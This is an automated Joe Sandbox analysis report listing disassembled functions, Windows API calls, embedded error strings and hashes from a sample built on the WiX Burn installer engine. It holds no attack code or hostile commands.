                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorLast
                                                                                                                                                                  • String ID: Failed to get HTTP status code for failed request to URL: %ls$Failed to get HTTP status code for request to URL: %ls$Failed to get redirect url: %ls$Failed to send request to URL: %ls, trying to process HTTP status code anyway.$Unknown HTTP status code %d, returned from URL: %ls$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\dlutil.cpp
                                                                                                                                                                  • API String ID: 1452528299-2050984236
                                                                                                                                                                  • Opcode ID: 5373890dc7ddf543a133769529dcba98606bdfe61a133c8d9b0e199e6e07ae09
                                                                                                                                                                  • Instruction ID: 145ca74a8bc0959d93d7426e4af8d706dbf7f1dc00b05989c170614958f1a1a0
                                                                                                                                                                  • Opcode Fuzzy Hash: 5373890dc7ddf543a133769529dcba98606bdfe61a133c8d9b0e199e6e07ae09
                                                                                                                                                                  • Instruction Fuzzy Hash: D3513573AC0516ABDB254E6CCC0EF6F3A5CEB81B50F14C665B91DEB2A0DE65CD009291
                                                                                                                                                                  Function 0097B8B0 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 154timeCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • SystemTimeToFileTime.KERNEL32(?,00000000,00000000,clbcatq.dll,00000000,clbcatq.dll,00000000,00000000,00000000), ref: 0097B9D2
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0097B9DC
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Time$ErrorFileLastSystem
                                                                                                                                                                  • String ID: Failed to convert system time to file time.$Failed to copy time.$clbcatq.dll$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\timeutil.cpp
                                                                                                                                                                  • API String ID: 2781989572-1833903446
                                                                                                                                                                  • Opcode ID: a7ba40f5b56ec59a137c5dcbf8b03ed841f80487006eac8f4c44026925d6c0d7
                                                                                                                                                                  • Instruction ID: ee158a7d2d161968c6233dee835926daf3d8a6edc00365afecbf2050697d6cc6
                                                                                                                                                                  • Opcode Fuzzy Hash: a7ba40f5b56ec59a137c5dcbf8b03ed841f80487006eac8f4c44026925d6c0d7
                                                                                                                                                                  • Instruction Fuzzy Hash: 5A41F563B5021976D7249B748C46FBFA66DEF91709F00C919F719BB2D0E6748E4083A1
                                                                                                                                                                  Function 00978047 Relevance: 10.6, APIs: 2, Strings: 5, Instructions: 139COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,00977F34,00000000,00000000,00000001), ref: 009780F0
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,00977F34,00000000,00000000,00000001), ref: 00978152
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorLast
                                                                                                                                                                  • String ID: Failed to add header to HTTP request.$Failed to allocate string for resource URI.$Failed to append query strong to resource from URI.$Failed to open internet request.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\dlutil.cpp
                                                                                                                                                                  • API String ID: 1452528299-283382383
                                                                                                                                                                  • Opcode ID: bca91b3490dd4318a43922caaef2ee64a89b08082c859244fd3249d336f7cf31
                                                                                                                                                                  • Instruction ID: ccfb3e6c676f41a213885157fb9c6ca40983f99f2b217593d6feea9aa052117a
                                                                                                                                                                  • Opcode Fuzzy Hash: bca91b3490dd4318a43922caaef2ee64a89b08082c859244fd3249d336f7cf31
                                                                                                                                                                  • Instruction Fuzzy Hash: 6F413D737C4329BBEB315A548C4EFAB755CAF45754F028524BE18BB191EAB0CC0192F0
                                                                                                                                                                  Function 0092D33E Relevance: 10.6, APIs: 1, Strings: 6, Instructions: 137sleepCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • Sleep.KERNEL32(000007D0,009331C1,009331C1), ref: 0092D3BF
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Sleep
                                                                                                                                                                  • String ID: Failed to calculate cache path.$Failed to get %hs package cache root directory.$Failed to get old %hs package cache root directory.$d:\a\wix4\wix4\src\burn\engine\cache.cpp$per-machine$per-user
                                                                                                                                                                  • API String ID: 3472027048-1762823252
                                                                                                                                                                  • Opcode ID: 1c93f146a7ff1dbaca893edc94dc21fb8730d72fb6c5db0a5d0fef398e1ea896
                                                                                                                                                                  • Instruction ID: 9f4303f4597044a6ddc59095b99fc1ece82189f7ac51042de8bc32dfe9f653a3
                                                                                                                                                                  • Opcode Fuzzy Hash: 1c93f146a7ff1dbaca893edc94dc21fb8730d72fb6c5db0a5d0fef398e1ea896
                                                                                                                                                                  • Instruction Fuzzy Hash: 25415872B42338BBFB21BA55DC07FBF265C9B80754F054021BE04FA2E5E6B49D4097A1
                                                                                                                                                                  Function 0096D37A Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 133COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _memcpy_s
                                                                                                                                                                  • String ID: Error reading wix version registry value due to unexpected data type: %u$Failed to convert registry string to wix version.$Failed to copy QWORD wix version value.$Failed to read wix version registry value.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\regutil.cpp
                                                                                                                                                                  • API String ID: 2001391462-1929277467
                                                                                                                                                                  • Opcode ID: 337aed46127230b5095d012965fda9eacefd9aca62e1f3799c7883c91a45d7cc
                                                                                                                                                                  • Instruction ID: 78ce1131d04c6438f96603860cd4235b1389a26b0298e16afaba51b90eb3881e
                                                                                                                                                                  • Opcode Fuzzy Hash: 337aed46127230b5095d012965fda9eacefd9aca62e1f3799c7883c91a45d7cc
                                                                                                                                                                  • Instruction Fuzzy Hash: 5C41D771F41318B6DB219B848C4AFEFBAB8DFC5B14F104056FA14762D1E7B45E40DAA1
                                                                                                                                                                  Function 00959350 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 00959387
                                                                                                                                                                  • ___except_validate_context_record.LIBVCRUNTIME ref: 0095938F
                                                                                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 00959418
                                                                                                                                                                  • __IsNonwritableInCurrentImage.LIBCMT ref: 00959443
                                                                                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 00959498
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                  • String ID: csm
                                                                                                                                                                  • API String ID: 1170836740-1018135373
                                                                                                                                                                  • Opcode ID: ef0fb39fc481e0ac66b4c7518b7d195fb8a4968b8feac4dce7ec01eab364338e
                                                                                                                                                                  • Instruction ID: cabdbfc31a2c69cfa2141dbb96d2702a20feef43abfef98d0114f9ac8f2fc370
                                                                                                                                                                  • Opcode Fuzzy Hash: ef0fb39fc481e0ac66b4c7518b7d195fb8a4968b8feac4dce7ec01eab364338e
                                                                                                                                                                  • Instruction Fuzzy Hash: AF41A134A00218EBDF10DF6AC884A9EBBB9BF45319F148155EC195B3A2D735AD0ACB90
                                                                                                                                                                  Function 0096D559 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 106registryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • RegQueryInfoKeyW.ADVAPI32(?,?,00928EB7,?,?,?,?), ref: 0096D584
                                                                                                                                                                  • RegEnumValueW.ADVAPI32(?,?,00928EB7,?,?,?,?), ref: 0096D609
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: EnumInfoQueryValue
                                                                                                                                                                  • String ID: Failed to allocate array for registry value name$Failed to enumerate registry value$Failed to get max size of value name under registry key.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\regutil.cpp
                                                                                                                                                                  • API String ID: 918324718-3509199686
                                                                                                                                                                  • Opcode ID: e77e6ccc2199c052a908f3a4a553394b885e3bb4bb653e0696d70852991fb961
                                                                                                                                                                  • Instruction ID: 6e017f90925e992a098f69d7581bbc0fdaaf4cfa388d8c082411e55ce44c843b
                                                                                                                                                                  • Opcode Fuzzy Hash: e77e6ccc2199c052a908f3a4a553394b885e3bb4bb653e0696d70852991fb961
                                                                                                                                                                  • Instruction Fuzzy Hash: 5A213B76B01219BBE7115B19CC44FFF36ADDBC6768F120026FE19AB340E6748D4196B0
                                                                                                                                                                  Function 0092770A Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 104registryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,00916CF2,000000FF,04685000,000000FF,00000000,PackageVersion,00916CF2,8D18C483,009331C1,00000001,00000000,00916CF2,009331C1,00916CF2), ref: 00927794
                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,00000000,PackageVersion,00916CF2,8D18C483,009331C1,00000001,00000000,00916CF2,009331C1,00916CF2,00000000,009331C1,009331C1,009331C1,00916CF2), ref: 009277B1
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to remove update registration key: %ls, xrefs: 009277E6
                                                                                                                                                                  • PackageVersion, xrefs: 00927775
                                                                                                                                                                  • d:\a\wix4\wix4\src\burn\engine\registration.cpp, xrefs: 0092774A, 009277F8
                                                                                                                                                                  • Failed to format key for update registration., xrefs: 00927738
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseCompareString
                                                                                                                                                                  • String ID: Failed to format key for update registration.$Failed to remove update registration key: %ls$PackageVersion$d:\a\wix4\wix4\src\burn\engine\registration.cpp
                                                                                                                                                                  • API String ID: 446873843-2063007608
                                                                                                                                                                  • Opcode ID: a18b5895fd461182749c6049d571e909b23cdc2a92df4c4d1ed632d0bb3af617
                                                                                                                                                                  • Instruction ID: f7cabfeae5893e0d895bc01073d45f87ba5c46fc9a25e5dceb05a17a96476f8e
                                                                                                                                                                  • Opcode Fuzzy Hash: a18b5895fd461182749c6049d571e909b23cdc2a92df4c4d1ed632d0bb3af617
                                                                                                                                                                  • Instruction Fuzzy Hash: A731B531D44239BADB22AAE59C4AFAFFEBCDF44B51F100261B914B6195E6708A40D6E0
                                                                                                                                                                  Function 0096D25B Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 100COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _memcpy_s
                                                                                                                                                                  • String ID: Error reading version registry value due to unexpected data type: %u$Failed to convert registry string to version.$Failed to copy QWORD version value.$Failed to read version registry value.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\regutil.cpp
                                                                                                                                                                  • API String ID: 2001391462-2150151203
                                                                                                                                                                  • Opcode ID: 8d81d2103b9de38beabd48dd6ca9b376cb65e71b308c490ba6bed40105758831
                                                                                                                                                                  • Instruction ID: 98d2808f00c5a62b7d9b31922a39f371bfcc4eba4013a2f154ee4fefb97f0074
                                                                                                                                                                  • Opcode Fuzzy Hash: 8d81d2103b9de38beabd48dd6ca9b376cb65e71b308c490ba6bed40105758831
                                                                                                                                                                  • Instruction Fuzzy Hash: 87210671F81318B6DB216A548C4FFEF7AACDF86B18F004055FA247A2C1E5B08A00D6D2
                                                                                                                                                                  Function 00972587 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseErrorExecuteHandleLastShell
                                                                                                                                                                  • String ID: <$ShellExecEx failed with return code: %d$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\shelutil.cpp
                                                                                                                                                                  • API String ID: 3023784893-2678215300
                                                                                                                                                                  • Opcode ID: de3b1e8b3c930b0779188288c2d0b340b18eadf0caa6834fd90a11a437a20fa1
                                                                                                                                                                  • Instruction ID: 1ac4254130e8953299a798ec47c3cffbf9d8bce190fcf5512c3615cf5d34f1df
                                                                                                                                                                  • Opcode Fuzzy Hash: de3b1e8b3c930b0779188288c2d0b340b18eadf0caa6834fd90a11a437a20fa1
                                                                                                                                                                  • Instruction Fuzzy Hash: 57315AB6E01219ABDB10DF9ADC44A9EBBF8EF98710F10401BF919F7350E77099418BA0
                                                                                                                                                                  Function 00954048 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 88COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • IsWindow.USER32(?), ref: 0095408F
                                                                                                                                                                    • Part of subcall function 0091540B: GetProcessHeap.KERNEL32(?,00000000,?,00915532,00000000,00000001,?,00000000,?,?,00000000,?,?,00000000,?,?), ref: 0091541C
                                                                                                                                                                    • Part of subcall function 0091540B: RtlAllocateHeap.NTDLL(00000000,?,00915532,00000000,00000001,?,00000000,?,?,00000000,?,?,00000000,?,?), ref: 00915423
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Heap$AllocateProcessWindow
                                                                                                                                                                  • String ID: BA passed NULL hwndParent to Apply.$BA passed invalid hwndParent to Apply.$Failed to alloc BOOTSTRAPPER_ENGINE_ACTION$Failed to enqueue apply action.$d:\a\wix4\wix4\src\burn\engine\externalengine.cpp
                                                                                                                                                                  • API String ID: 850432942-3904185537
                                                                                                                                                                  • Opcode ID: c0cfb8e6d8e26c6e4f0fcc70dcb4e0e65c7c32e0e803bee23ec74824ca6d4e2b
                                                                                                                                                                  • Instruction ID: 79a1f0634f0d5c8d880546195738f10055e3ae728416addb6e9a1dc8c6c02487
                                                                                                                                                                  • Opcode Fuzzy Hash: c0cfb8e6d8e26c6e4f0fcc70dcb4e0e65c7c32e0e803bee23ec74824ca6d4e2b
                                                                                                                                                                  • Instruction Fuzzy Hash: 52210771B81314BBEB2196159C4BFAF255CCBA5B59F120114BA007F1C1E6E59EC057E2
                                                                                                                                                                  Function 0092B286 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 87COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _memcpy_s
                                                                                                                                                                  • String ID: Failed to allocate memory for message.$Failed to calculate total pipe message size$d:\a\wix4\wix4\src\burn\engine\pipe.cpp
                                                                                                                                                                  • API String ID: 2001391462-2608942841
                                                                                                                                                                  • Opcode ID: 56388e7705170f9085da55e084bb55097c21b1c9f1ad7e89b4bd07a0a0d69e9a
                                                                                                                                                                  • Instruction ID: 358e8ce9ff95bc0b6f9e5ccf1bbe9df46f8ca1ab60c6aca3f667a1cb32dc28a5
                                                                                                                                                                  • Opcode Fuzzy Hash: 56388e7705170f9085da55e084bb55097c21b1c9f1ad7e89b4bd07a0a0d69e9a
                                                                                                                                                                  • Instruction Fuzzy Hash: D321C1B260021CBBDB11EA95CC86FEFB7ACEFD9724F050116F605A7241E7B49A4087A1
                                                                                                                                                                  Function 0092D4BF Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 87COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • InitializeAcl.ADVAPI32(?,00000008,00000002,0000001A,00000000,00000000,00000000), ref: 0092D523
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0092D52D
                                                                                                                                                                  • SetFileAttributesW.KERNEL32(?,00000080,?,00000001,20000004,00000000,00000000,?,00000000,00000003,000007D0,00000000,00000000), ref: 0092D599
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AttributesErrorFileInitializeLast
                                                                                                                                                                  • String ID: Failed to allocate administrator SID.$Failed to initialize ACL.$d:\a\wix4\wix4\src\burn\engine\cache.cpp
                                                                                                                                                                  • API String ID: 669721577-2625618253
                                                                                                                                                                  • Opcode ID: a6d95943983397b8bffda226c3593b8e90ecfc405e9db8d58ad586674435468e
                                                                                                                                                                  • Instruction ID: d4d1d28e9abd57e9aa872d9376a6579f2750be27634c88f990e2910e9c4f2699
                                                                                                                                                                  • Opcode Fuzzy Hash: a6d95943983397b8bffda226c3593b8e90ecfc405e9db8d58ad586674435468e
                                                                                                                                                                  • Instruction Fuzzy Hash: 6D212F72F4172477E7216A999C86F9FB67C9F85B54F114055BA04B72C5E2F0DD008BA0
                                                                                                                                                                  Function 0097BB11 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 86timeCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0097BB55
                                                                                                                                                                  • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 0097BB94
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0097BB9E
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorLastTime$FileSystem
